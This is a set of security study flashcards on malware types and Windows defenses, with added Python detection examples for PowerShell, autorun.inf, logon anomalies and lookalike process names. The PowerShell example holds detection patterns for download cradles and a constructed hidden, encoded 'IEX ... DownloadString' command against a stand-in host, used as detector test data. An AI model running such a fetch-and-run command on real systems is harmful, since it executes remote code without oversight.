A security analyst receives a notification of possible malware based on common indicators. After conducting several analyses, the analyst learns the malware used Windows PowerShell to create new malicious processes in the computer's memory. What is the analyst's computer likely infected with?
Fileless malware
Fileless malware refers to malicious code that uses the host’s scripting environment, such as Windows PowerShell or PDF JavaScript, to create _________________________.
new malicious processes in memory
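The scenario above is what a process-creation or script-block log looks like in practice: a powershell.exe command line with a hidden window, no profile, and an -EncodedCommand blob that unpacks to a download cradle. The following is an added example, not part of the original study set: a small Python scorer that decodes the base64/UTF-16LE argument the way PowerShell does and weights the common indicators. The indicator weights and the two sample command lines are constructed for this example and are not vendor signatures or real telemetry.

```python
"""Heuristic scoring of PowerShell command lines for fileless-malware indicators."""
import base64
import binascii
import re

# Indicator name, pattern, weight. The weights are an illustrative assumption for
# this example, not a vendor's detection scheme. PowerShell accepts any unambiguous
# prefix of a switch, so -w, -win and -WindowStyle all mean the same thing.
INDICATORS = [
    ("hidden_window",     re.compile(r"(?:^|\s)-w[a-z]*\s+hidden\b", re.I), 2),
    ("no_profile",        re.compile(r"(?:^|\s)-nop[a-z]*\b", re.I), 1),
    ("bypass_policy",     re.compile(r"(?:^|\s)-e[a-z]*\s+bypass\b", re.I), 1),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("download_cradle",   re.compile(
        r"\b(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I), 3),
    ("base64_decode",     re.compile(r"FromBase64String", re.I), 2),
]
ENCODED_WEIGHT = 3

# -e, -ec, -enc, ... -EncodedCommand followed by a base64 token.
ENCODED_RE = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if there is none.

    PowerShell expects base64 of the UTF-16LE encoding of the script, so a blob
    that does not decode that way is not treated as an encoded command.
    """
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_command_line(cmdline):
    """Return {'score', 'indicators', 'decoded'} for one process-creation command line."""
    decoded = decode_encoded_command(cmdline)
    # Scan the raw command line and the decoded payload together: the interesting
    # keywords (IEX, DownloadString) usually sit inside the base64 blob.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [(name, weight) for name, pattern, weight in INDICATORS if pattern.search(text)]
    if decoded is not None:
        hits.insert(0, ("encoded_command", ENCODED_WEIGHT))
    return {
        "score": sum(weight for _, weight in hits),
        "indicators": [name for name, _ in hits],
        "decoded": decoded,
    }


def is_suspicious(cmdline, threshold=5):
    """True when the weighted indicator score reaches the (assumed) alert threshold."""
    return analyze_command_line(cmdline)["score"] >= threshold


def ps_encode(script):
    """Produce the argument powershell -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines for this example, not real telemetry.
BENIGN_CMD = r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
MALICIOUS_CMD = "powershell.exe -nop -w hidden -enc " + ps_encode(CRADLE)

if __name__ == "__main__":
    for cmd in (BENIGN_CMD, MALICIOUS_CMD):
        print(analyze_command_line(cmd))
```

The benign admin script scores 2 (no profile plus execution-policy bypass, both common in legitimate scheduled tasks), while the encoded cradle scores 12 because the decoded payload exposes the IEX and WebClient indicators that the raw command line hides. Feeding this the CommandLine field from Sysmon event 1 or Windows event 4688 is the usual deployment; script-block logging (event 4104) already gives you the decoded text.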
Worms __________ processes in system memory rather than infecting an executable file stored on a disk.
replicate between
Boot sector viruses infect the boot sector code or _______ on a disk drive. While this could be a possible option, memory-based malware running inside the code of another program is quite common.
partition table
Viruses are concealed within the code of an _______________ stored as a file on a disk. In Windows, executable code has extensions such as .EXE, .MSI, .DLL, .COM, .SCR, and .JAR.
executable process image
A manager is responsible for client laptops and is concerned that if a disk is removed and attached to a different OS, the NTFS permissions protecting the data can simply be overridden. What will help prevent this possible attack?
Encrypting File System
The Encrypting File System (EFS) feature of the New Technology File System (NTFS) ___________________. EFS is not available in the Home edition of Windows.
supports file and folder encryption
The Windows Defender Firewall with Advanced Security console allows the configuration of a custom ___________________________.
inbound and outbound filtering rule.
Antivirus is software that can detect malware and ______________. The primary means of detection is to use a database of known virus patterns called definitions, signatures, or patterns.
prevent it from executing
Execution control refers to _______________ designed to prevent malicious software from running on a host regardless of what the user account privileges allow.
logical security technologies
A security administrator wants to set up anomaly-based monitoring of user behavior. Which of the following could the administrator monitor? (Select all that apply.)
Failed attempts
Login times
Concurrent logins
A security manager in charge of the vulnerability program for the enterprise is looking at mobile security. They are reading about a "walled garden" approach. What does this entail?
Trusted source
Mobile OS vendors use this "walled garden" model of ____________ as well. Apps are distributed from an approved store, such as Apple's App Store or the Windows Store.
software distribution
One of the problems with legacy versions of Windows is that when an _________________ or a USB drive is attached, Windows would automatically run commands defined in an autorun.inf file.
optical disc is inserted
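autorun.inf is an INI-style file with an [autorun] section whose open=, shellexecute= and shell\verb\command= directives name what Windows would launch. The following is an added example, not part of the original study set: a Python parser that reports every directive in such a file that causes code execution, which is what you want to know when triaging a removable drive image. The sample file content is constructed for this example.

```python
"""List the auto-executed commands declared in an autorun.inf file."""
import configparser

# Directives in the [autorun] section that launch a program. Keys of the form
# shell\<verb>\command do the same for a right-click menu verb.
EXECUTING_KEYS = {"open", "shellexecute"}


def autorun_commands(text):
    """Return [(directive, command)] for every directive that would execute code."""
    # interpolation=None so a '%' in a path is not treated as a substitution;
    # only '=' is a delimiter so a ':' in a path does not split the key.
    parser = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    parser.read_string(text)
    found = []
    for section in parser.sections():
        # Windows treats the section name case-insensitively.
        if section.lower() != "autorun":
            continue
        for key, value in parser.items(section):
            key = key.lower()
            if key in EXECUTING_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
                found.append((key, value.strip()))
    return found


# Constructed sample autorun.inf for this example; the paths are made up.
SAMPLE_AUTORUN = r"""; vendor driver disc
[autorun]
open=setup.exe /s
icon=setup.exe,0
label=Vendor Drivers
shellexecute=recycler\update.exe
shell\install\command=recycler\update.exe -q
"""

if __name__ == "__main__":
    for directive, command in autorun_commands(SAMPLE_AUTORUN):
        print(f"{directive:24} -> {command}")
```

The icon= and label= lines are cosmetic and are skipped; the three remaining directives are exactly what legacy Windows would have run on insertion. On current Windows, AutoRun for removable media is disabled by policy, so the practical use of this check is forensic: confirming what a found drive was set up to launch.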
Concurrent logins are another behavioral-based ____________. Most users should only need to sign in to one computer at a time.
monitoring mechanism
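The three behavioral signals from the "Select all that apply" question above (failed attempts, login times, concurrent logins) can be checked with a single pass over time-ordered logon records. The following is an added example, not part of the original study set: Python detection logic run over a constructed set of logon records modeled loosely on Windows Security events 4624 (success), 4625 (failure) and 4634 (logoff). The thresholds (5 failures in 10 minutes, 08:00 to 18:00 on weekdays as normal hours) are assumptions for the example, not a standard.

```python
"""Anomaly checks over logon records: failed attempts, login times, concurrent logins."""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def detect_anomalies(events, fail_threshold=5, fail_window=timedelta(minutes=10),
                     work_hours=(8, 18)):
    """Return [(rule, user, detail)] for a time-ordered list of (ts, user, host, kind).

    kind is one of "logon_ok", "logon_fail" or "logoff". Events must be sorted by
    time; the session tracking below assumes that.
    """
    alerts = []
    recent_failures = defaultdict(deque)   # user -> timestamps of failures in the window
    active = defaultdict(dict)             # user -> {host: time of successful logon}

    for ts_str, user, host, kind in events:
        ts = datetime.strptime(ts_str, "%Y-%m-%d %H:%M:%S")

        if kind == "logon_fail":
            window = recent_failures[user]
            window.append(ts)
            while window and ts - window[0] > fail_window:   # drop failures too old to count
                window.popleft()
            if len(window) >= fail_threshold:
                alerts.append(("failed_attempts", user,
                               f"{len(window)} failures within {fail_window} ending {ts}"))
                window.clear()                                # one alert per burst

        elif kind == "logon_ok":
            recent_failures[user].clear()
            off_hours = ts.weekday() >= 5 or not (work_hours[0] <= ts.hour < work_hours[1])
            if off_hours:
                alerts.append(("login_time", user, f"logon to {host} at {ts}"))
            elsewhere = sorted(h for h in active[user] if h != host)
            if elsewhere:
                alerts.append(("concurrent_logins", user,
                               f"logon to {host} while still active on {', '.join(elsewhere)}"))
            active[user][host] = ts

        elif kind == "logoff":
            active[user].pop(host, None)

    return alerts


# Constructed sample records for this example, not real Security log output.
# 2024-03-04 is a Monday; 2024-03-09 is a Saturday.
SAMPLE_EVENTS = [
    ("2024-03-04 08:55:10", "alice", "WS-01",  "logon_ok"),
    ("2024-03-04 09:00:00", "bob",   "WS-07",  "logon_fail"),
    ("2024-03-04 09:00:30", "bob",   "WS-07",  "logon_fail"),
    ("2024-03-04 09:01:00", "bob",   "WS-07",  "logon_fail"),
    ("2024-03-04 09:01:30", "bob",   "WS-07",  "logon_fail"),
    ("2024-03-04 09:02:00", "bob",   "WS-07",  "logon_fail"),
    ("2024-03-04 09:03:40", "bob",   "WS-07",  "logon_ok"),
    ("2024-03-04 10:15:00", "alice", "WS-22",  "logon_ok"),   # alice still signed in on WS-01
    ("2024-03-04 12:00:00", "alice", "WS-01",  "logoff"),
    ("2024-03-04 23:40:00", "carol", "SRV-DB", "logon_ok"),   # late-night logon
    ("2024-03-09 11:00:00", "dave",  "WS-03",  "logon_ok"),   # weekend logon
]

if __name__ == "__main__":
    for rule, user, detail in detect_anomalies(SAMPLE_EVENTS):
        print(f"{rule:18} {user:6} {detail}")
```

The run produces four alerts: bob's burst of five failures, alice's second simultaneous session, carol's 23:40 logon and dave's Saturday logon. In a real deployment the concurrent-login rule needs per-user baselines (help-desk staff legitimately hold several sessions) and the off-hours rule needs the user's own time zone, which is why these are tuned per role rather than applied as fixed constants.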
A server administrator notices that a few servers in their screened subnet (demilitarized zone) went from around 5% central processing unit (CPU) utilization to 95%. They also notice the machines lack many patches. If malware infects the servers, what is the likely cause of the high CPU utilization?
Cryptomining software
A cryptominer hijacks the resources of the host to perform cryptocurrency mining. This is also referred to as ___________.
cryptojacking
Ransomware is a type of malware that tries to extort money from the victim. Crypto-ransomware attempts to ____________, removable, and network drive.
encrypt files on any fixed
Rogue antivirus is a particularly popular way to ____________. In the early versions of this attack, a website would display a pop-up disguised as a normal Windows dialog box with a fake security alert.
disguise a Trojan
Modern malware is usually designed to implement some type of __________, also referred to as a remote access Trojan (RAT).
backdoor
A helpdesk operator is reviewing a notification that a user clicked links in a very suspicious email. After verifying there are symptoms of malware, what is the next step the operator should take?
Quarantine.
Once the ________ is isolated, the next step is to disable System Restore and other automated backup systems, such as File History.
infected system
Another good step after isolation is to look for additional executable files with names similar to those of ____________ files and utilities, such as scvhost.exe or ta5kmgr.exe.
authentic system
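Spotting scvhost.exe or ta5kmgr.exe by eye does not scale to a full process list, but the check is mechanical: normalize digit-for-letter swaps and measure edit distance against the genuine system binary names. The following is an added example, not part of the original study set: a Python lookalike finder run over a constructed process list. The list of legitimate names and the substitution table are small illustrative sets, not a complete reference.

```python
"""Flag process names that imitate genuine Windows system binaries."""

# Names of genuine Windows binaries to compare against (illustrative subset).
LEGIT_NAMES = [
    "svchost.exe", "taskmgr.exe", "lsass.exe", "csrss.exe",
    "explorer.exe", "winlogon.exe", "services.exe", "smss.exe",
]

# Character substitutions attackers use so a name looks right at a glance.
SUBSTITUTIONS = [
    ("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"),
    ("4", "a"), ("5", "s"), ("7", "t"), ("8", "b"),
]


def normalize(name):
    """Lower-case the name and undo common look-alike substitutions."""
    name = name.lower()
    for fake, real in SUBSTITUTIONS:
        name = name.replace(fake, real)
    return name


def edit_distance(a, b):
    """Levenshtein distance between two strings (insert, delete, substitute)."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1,            # delete ca
                               current[j - 1] + 1,         # insert cb
                               previous[j - 1] + (ca != cb)))  # substitute
        previous = current
    return previous[-1]


def find_lookalikes(running, legit=LEGIT_NAMES, max_distance=2):
    """Return [(process, imitated_name, distance)] for names close to but not equal to a real one."""
    legit_set = {n.lower() for n in legit}
    flagged = []
    for proc in running:
        if proc.lower() in legit_set:          # exact match: the real binary (path check is separate)
            continue
        candidate = normalize(proc)
        best = min(legit, key=lambda real: edit_distance(candidate, normalize(real)))
        distance = edit_distance(candidate, normalize(best))
        if distance <= max_distance:
            flagged.append((proc, best, distance))
    return flagged


# Constructed sample process list for this example.
SAMPLE_PROCESSES = [
    "svchost.exe", "scvhost.exe", "ta5kmgr.exe", "lsas.exe",
    "chrome.exe", "explorer.exe", "svch0st.exe", "notepad.exe",
]

if __name__ == "__main__":
    for proc, real, distance in find_lookalikes(SAMPLE_PROCESSES):
        print(f"{proc:14} imitates {real:14} (distance {distance})")
```

The transposed scvhost.exe sits at distance 2 from svchost.exe, ta5kmgr.exe and svch0st.exe normalize to distance 0, and lsas.exe is one deletion from lsass.exe; chrome.exe and notepad.exe are not near anything on the list. An exact name match is deliberately not flagged here, because a genuine svchost.exe name is also what malware uses when it plants a copy outside System32; that case is caught by checking the image path and signature, not the name.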
A Firefox user wants to open up their browser settings to configure their intranet as the home page. How can the Firefox user access the settings?
about:preferences
A security analyst baselines web activity and notices several browser behaviors to account for. For example, when a user types a search query, the browser actually sends a query after every keystroke (for search suggestions). The analyst is trying to group browser activity by code base. Which browser is based on the same code as Chrome?
Edge
A user visits a news site that they go to frequently, and the news articles are not updated but are the same as the day before. The user also hears complaints about people not having internet, which is odd since they are on their normal news site. What is most likely going on?
Page is cached.
A developer wants to add functionality to a web browser by calling the browser's own API. What should the developer build?
Extension
Extensions add or change a __________ via its application programming interface (API). The extension must be granted specific permissions to make configuration changes. With sufficient permissions, they can run scripts that interact with the pages the user is viewing.
browser feature
Plug-ins play or show some sort of _______ in a web page, such as Flash, Silverlight, or other video/multimedia format.
content embedded
A security manager wants to set up a program where they can proactively mitigate malware infection as much as possible. Which of the following is least helpful in this endeavor?
Update trusted root certificates
A server administrator helps the human resources department build a new internal website for their new training platform, which needs to remain secure. What will the administrator need to do to ensure the web page shows as secure in users' browsers?
Add trusted certificates.
Unless the site is running a _______, the firewall would not need to be adjusted. Normal web traffic operates off ports 80 and 443.
non-standard port
A security manager is setting up a password policy for users. Which of the following is the best security practice when it comes to passwords?
Length
A developer is reading their email and comes across a new memorandum from the security department about a clean desk policy. Why does security need to publish this?
Personally identifiable information (PII) protection
A system ______ is one that is required before any operating system can boot. The system password can be configured by the basic input/output system (BIOS) or unified extensible firmware interface (UEFI) setup program.
password
A security manager, as one layer of a defense in depth strategy, sets up monitoring to catch communications between the attacker and the malware. What is the manager monitoring for?
C2
Whether a backdoor is used as a standalone intrusion mechanism or to manage bots, the threat actor must establish a _________ from the compromised host to a command and control (C2 or C&C) host or network.
connection
Spyware is malware that can perform _________, such as allowing tracking cookies, changing default search providers, opening arbitrary pages at startup, adding bookmarks, and so on.
browser reconfigurations
A keylogger is spyware that actively attempts to steal confidential information by ______ keystrokes.
recording
When dealing with a rootkit, administrators should be aware that there is the possibility that it can compromise system files and programming interfaces so that_____________no longer reveal their presence.
local shell processes